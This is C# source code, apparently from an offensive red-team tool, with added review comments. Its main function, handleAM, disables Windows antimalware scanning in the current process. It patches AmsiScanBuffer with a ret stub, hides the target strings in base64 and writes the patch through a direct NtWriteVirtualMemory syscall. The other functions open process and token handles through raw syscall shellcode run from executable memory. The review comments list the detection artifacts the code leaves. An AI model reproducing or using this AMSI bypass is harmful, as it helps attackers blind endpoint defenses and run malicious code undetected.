        /// <summary>
        /// Patches amsi!AmsiScanBuffer in the current process so that it returns immediately.
        /// The six bytes written at its entry decode to <c>mov eax, 0x80070057 ; ret</c>
        /// (E_INVALIDARG), so every scan request fails before the buffer is inspected. The write
        /// goes through a raw NtWriteVirtualMemory syscall stub supplied by <paramref name="sysCall"/>,
        /// and the kernel32 exports used along the way (LoadLibraryA, GetProcAddress, VirtualProtectEx,
        /// VirtualAlloc) are called through a PE_MANUAL_MAP of kernel32.dll rather than the loaded image.
        /// </summary>
        /// <param name="sysCall">Source of the syscall stub bytes and of the mapped kernel32 image.</param>
        /// <returns>
        /// <c>false</c> when AmsiScanBuffer cannot be resolved or NtWriteVirtualMemory returns a
        /// non-zero NTSTATUS; <c>true</c> otherwise. The VirtualAlloc and VirtualProtectEx results
        /// are never examined, so <c>true</c> only means the write call itself reported success.
        /// </returns>
        /// <remarks>
        /// NOTE(review): from a detection standpoint this routine leaves several artifacts: a private
        /// RW->RX allocation holding the syscall stub that is never freed, a PAGE_READWRITE transition
        /// on an amsi.dll code page, and the patch bytes themselves at the AmsiScanBuffer entry.
        /// The Process object from Process.GetCurrentProcess() is also never disposed.
        /// </remarks>
        public static bool handleAM(SysCallManager sysCall)
        {
            // B8 57 00 07 80 = mov eax, 0x80070057 (E_INVALIDARG); C3 = ret.
            var  hook = new byte[] { 0xB8, 0x57, 0x00, 0x07, 0x80, 0xC3 };
            uint oldProtect = 0, x = 0;
            var  shellCode = sysCall.GetSysCallAsm("NtWriteVirtualMemory");

            DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
            // Base64 of "amsi.dll" — presumably kept encoded to keep the plain string out of the binary.
            object[] loadLibrary = { Encoding.UTF8.GetString(Convert.FromBase64String("YW1zaS5kbGw=")) };

            IntPtr libraryAddress = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "LoadLibraryA",
                                                                                      typeof(DInvoke.Win32.DELEGATES.LoadLibrary), loadLibrary);

            // Base64 of "AmsiScanBuffer". libraryAddress itself is not checked; a failed
            // LoadLibraryA only surfaces as a null export below.
            object[] procAddress = { libraryAddress, Encoding.UTF8.GetString(Convert.FromBase64String("QW1zaVNjYW5CdWZmZXI=")) };

            var address = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "GetProcAddress",
                                                                            typeof(DInvoke.Win32.DELEGATES.GetProcAddress), procAddress);

            if (address == IntPtr.Zero)
            {
                return(false);
            }

            // (IntPtr)(-1) is the current-process pseudo-handle; 0x004 is PAGE_READWRITE. The previous
            // protection is expected to be written back into parameters[4] by the mapped export call.
            object[] parameters = { (IntPtr)(-1), address, (UIntPtr)hook.Length, (uint)0x004, oldProtect };

            IntPtr hProcess = Process.GetCurrentProcess().Handle;

            IntPtr response = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
                                                                                typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);

            // The VirtualProtectEx result is ignored; only the old protection is recovered.
            oldProtect = (uint)parameters[4];

            // Stub buffer is committed RW here and flipped to RX further down, just before it runs.
            object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
                                      DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
            var      shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
                                                                                         typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);

            // Allocation result is not checked; Marshal.Copy throws if shellCodeBuffer is null.
            Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
            var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtWriteVirtualMemory));
            // Last argument (the bytes-written out pointer in the documented prototype) is passed as null.
            var arguments       = new object[] { hProcess, address, hook, (UIntPtr)(hook.Length), IntPtr.Zero };

            uint old = 0;

            // RW -> RX on the stub page before invoking it; result again unchecked. If this fails the
            // DynamicInvoke below would be expected to fault under DEP.
            parameters = new object[] { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, old };
            response   = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
                                                                           typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
            var returnValue = sysCallDelegate.DynamicInvoke(arguments);

            // Non-zero NTSTATUS from the write means the patch did not land.
            if ((int)returnValue != 0)
            {
                return(false);
            }

            // Restore the original protection on the AmsiScanBuffer page; the stub buffer is left mapped.
            parameters = new object[] { (IntPtr)(-1), address, (UIntPtr)hook.Length, oldProtect, x };
            response   = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
                                                                           typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);



            return(true);
        }
        /////////////////////////// Processes related functions ///////////////////////////

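        /// <summary>
        /// Opens a handle to process <paramref name="pid"/> with <paramref name="flags"/> through a raw
        /// NtOpenProcess syscall stub obtained from <paramref name="sysCall"/>. The stub bytes are placed
        /// in a fresh read/write/execute allocation made via the mapped kernel32 VirtualAlloc export and
        /// executed through a delegate bound to that buffer.
        /// </summary>
        /// <param name="pid">Target process id; becomes CLIENT_ID.UniqueProcess.</param>
        /// <param name="handle">
        /// Receives the opened handle, or IntPtr.Zero when the stub could not be staged or the syscall
        /// returned a non-zero NTSTATUS.
        /// </param>
        /// <param name="flags">Desired access, passed straight to NtOpenProcess.</param>
        /// <param name="sysCall">Source of the syscall stub bytes and of the mapped kernel32 image.</param>
        /// <remarks>
        /// NOTE(review): the stub buffer is allocated RWX and is never released, so every call leaks one
        /// executable private region. The sibling GetProcessToken stages its stub RW and flips it to RX
        /// instead; the two paths are not consistent with each other.
        /// </remarks>
        public static void GetProcessHandle(int pid, out IntPtr handle, DInvoke.Win32.Kernel32.ProcessAccessFlags flags, SysCallManager sysCall)
        {
            handle = IntPtr.Zero;
            var clientId = new DInvoke.Win32.Kernel32.CLIENT_ID()
            {
                UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero
            };
            var objectAtt = new DInvoke.Win32.Kernel32.OBJECT_ATTRIBUTES(null, 0);

            DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");

            var shellCode = sysCall.GetSysCallAsm("NtOpenProcess");

            // Fix: a missing stub used to surface as a NullReferenceException on shellCode.Length;
            // treat it like any other staging failure and leave handle == IntPtr.Zero.
            if (shellCode == null || shellCode.Length == 0)
            {
                return;
            }

            object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
                                      DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteReadWrite };
            var shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
                                                                                    typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);

            // Fix: an allocation failure used to reach Marshal.Copy with a null destination and throw.
            if (shellCodeBuffer == IntPtr.Zero)
            {
                return;
            }

            Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
            var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess));

            // The handle comes back through the argument array: DynamicInvoke writes out/ref parameters
            // back into it, so slot 0 holds the result after the call.
            var arguments   = new object[] { handle, flags, objectAtt, clientId };
            var returnValue = sysCallDelegate.DynamicInvoke(arguments);

            handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero;
        }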
        /// <summary>
        /// Opens a token handle for process <paramref name="handle"/> through a raw NtOpenProcessToken
        /// syscall stub obtained from <paramref name="sysCall"/>. The stub bytes are copied into a fresh
        /// read/write allocation that is switched to read/execute (both via the mapped kernel32 exports)
        /// before it is invoked through a delegate.
        /// </summary>
        /// <param name="handle">Process handle whose token is requested.</param>
        /// <param name="access">Requested token access, passed straight to the syscall.</param>
        /// <param name="currentToken">Receives the token handle, or IntPtr.Zero on a non-zero NTSTATUS.</param>
        /// <param name="sysCall">Source of the syscall stub bytes and of the mapped kernel32 image.</param>
        /// <remarks>
        /// NOTE(review): neither the VirtualAlloc nor the VirtualProtectEx result is checked. A failed
        /// allocation makes Marshal.Copy throw; a failed protection change leaves the page RW and the
        /// DynamicInvoke below would be expected to fault under DEP. The stub buffer is never released.
        /// </remarks>
        public static void GetProcessToken(IntPtr handle, DInvoke.Win32.WinNT._TOKEN_ACCESS_FLAGS access, out IntPtr currentToken, SysCallManager sysCall)
        {
            DInvoke.PE.PE_MANUAL_MAP moduleDetails = sysCall.getMappedModule("C:\\Windows\\System32\\kernel32.dll");
            var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken");

            // Stub buffer is committed RW here; it is flipped to RX below, after the copy.
            object[] virtualAlloc = { IntPtr.Zero, (UIntPtr)shellCode.Length, DInvoke.Win32.Kernel32.MemoryAllocationFlags.Commit | DInvoke.Win32.Kernel32.MemoryAllocationFlags.Reserve,
                                      DInvoke.Win32.Kernel32.MemoryProtectionFlags.ReadWrite };
            var      shellCodeBuffer = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualAlloc",
                                                                                         typeof(DInvoke.Win32.DELEGATES.VirtualAlloc), virtualAlloc);

            Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
            var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken));
            // token is the out slot; the result is read back from arguments[2] after DynamicInvoke.
            var token           = IntPtr.Zero;
            var arguments       = new object[] { handle, access, token };

            uint oldProtect = 0;

            // (IntPtr)(-1) is the current-process pseudo-handle. RW -> RX on the stub page; oldProtect
            // is only a receive slot and is not used afterwards.
            object[] parameters = { (IntPtr)(-1), shellCodeBuffer, (UIntPtr)shellCode.Length, (uint)DInvoke.Win32.Kernel32.MemoryProtectionFlags.ExecuteRead, oldProtect };
            IntPtr   response   = (IntPtr)DInvoke.Generic.CallMappedDLLModuleExport(moduleDetails.PEINFO, moduleDetails.ModuleBase, "VirtualProtectEx",
                                                                                    typeof(DInvoke.Win32.DELEGATES.VirtualProtectEx), parameters);
            var returnValue = sysCallDelegate.DynamicInvoke(arguments);


            // Zero NTSTATUS -> token handle written back into the argument array; otherwise no handle.
            currentToken = (int)returnValue == 0 ? (IntPtr)arguments[2] : IntPtr.Zero;
        }
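        /// <summary>
        /// Opens a token handle for process <paramref name="handle"/> through a raw NtOpenProcessToken
        /// syscall stub obtained from <paramref name="sysCall"/>. The stub bytes are copied into a fresh
        /// read/write/execute allocation and executed through a delegate bound to that buffer.
        /// </summary>
        /// <param name="handle">Process handle whose token is requested.</param>
        /// <param name="access">Requested token access, passed straight to the syscall.</param>
        /// <param name="currentToken">
        /// Receives the token handle, or IntPtr.Zero when the stub could not be staged or the syscall
        /// returned a non-zero NTSTATUS.
        /// </param>
        /// <param name="sysCall">Source of the syscall stub bytes.</param>
        /// <remarks>
        /// NOTE(review): the stub buffer is allocated RWX and is never released, so every call leaks one
        /// executable private region.
        /// </remarks>
        public static void GetProcessToken(IntPtr handle, TokenAccessFlags access, out IntPtr currentToken, SysCallManager sysCall)
        {
            currentToken = IntPtr.Zero;

            var shellCode = sysCall.GetSysCallAsm("NtOpenProcessToken");

            // Fix: a missing stub used to surface as a NullReferenceException on shellCode.Length;
            // treat it like any other staging failure and leave currentToken == IntPtr.Zero.
            if (shellCode == null || shellCode.Length == 0)
            {
                return;
            }

            var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);

            // Fix: an allocation failure used to reach Marshal.Copy with a null destination and throw.
            if (shellCodeBuffer == IntPtr.Zero)
            {
                return;
            }

            Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
            var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcessToken));

            // token is the out slot: DynamicInvoke writes out/ref parameters back into the argument
            // array, so slot 2 holds the result after the call.
            var token       = IntPtr.Zero;
            var arguments   = new object[] { handle, access, token };
            var returnValue = sysCallDelegate.DynamicInvoke(arguments);

            if ((int)returnValue == 0)
            {
                currentToken = (IntPtr)arguments[2];
            }
        }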
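        /// <summary>
        /// Opens a handle to process <paramref name="pid"/> with <paramref name="flags"/> through a raw
        /// NtOpenProcess syscall stub obtained from <paramref name="sysCall"/>. The stub bytes are placed
        /// in a fresh read/write/execute allocation and executed through a delegate bound to that buffer.
        /// </summary>
        /// <param name="pid">Target process id; becomes CLIENT_ID.UniqueProcess.</param>
        /// <param name="handle">
        /// Receives the opened handle, or IntPtr.Zero when the stub could not be staged or the syscall
        /// returned a non-zero NTSTATUS.
        /// </param>
        /// <param name="flags">Desired access, passed straight to NtOpenProcess.</param>
        /// <param name="sysCall">Source of the syscall stub bytes.</param>
        /// <remarks>
        /// NOTE(review): the stub buffer is allocated RWX and is never released, so every call leaks one
        /// executable private region.
        /// </remarks>
        public static void GetProcessHandle(int pid, out IntPtr handle, ProcessAccessFlags flags, SysCallManager sysCall)
        {
            handle = IntPtr.Zero;
            var clientId = new CLIENT_ID()
            {
                UniqueProcess = new IntPtr(pid), UniqueThread = IntPtr.Zero
            };
            var objectAtt = new OBJECT_ATTRIBUTES(null, 0);

            var shellCode = sysCall.GetSysCallAsm("NtOpenProcess");

            // Fix: a missing stub used to surface as a NullReferenceException on shellCode.Length;
            // treat it like any other staging failure and leave handle == IntPtr.Zero.
            if (shellCode == null || shellCode.Length == 0)
            {
                return;
            }

            var shellCodeBuffer = VirtualAlloc(IntPtr.Zero, (UIntPtr)shellCode.Length, MemoryAllocationFlags.Commit | MemoryAllocationFlags.Reserve, MemoryProtectionFlags.ExecuteReadWrite);

            // Fix: an allocation failure used to reach Marshal.Copy with a null destination and throw.
            if (shellCodeBuffer == IntPtr.Zero)
            {
                return;
            }

            Marshal.Copy(shellCode, 0, shellCodeBuffer, shellCode.Length);
            var sysCallDelegate = Marshal.GetDelegateForFunctionPointer(shellCodeBuffer, typeof(NtOpenProcess));

            // The handle comes back through the argument array: DynamicInvoke writes out/ref parameters
            // back into it, so slot 0 holds the result after the call.
            var arguments   = new object[] { handle, flags, objectAtt, clientId };
            var returnValue = sysCallDelegate.DynamicInvoke(arguments);

            handle = (int)returnValue == 0 ? (IntPtr)arguments[0] : IntPtr.Zero;
        }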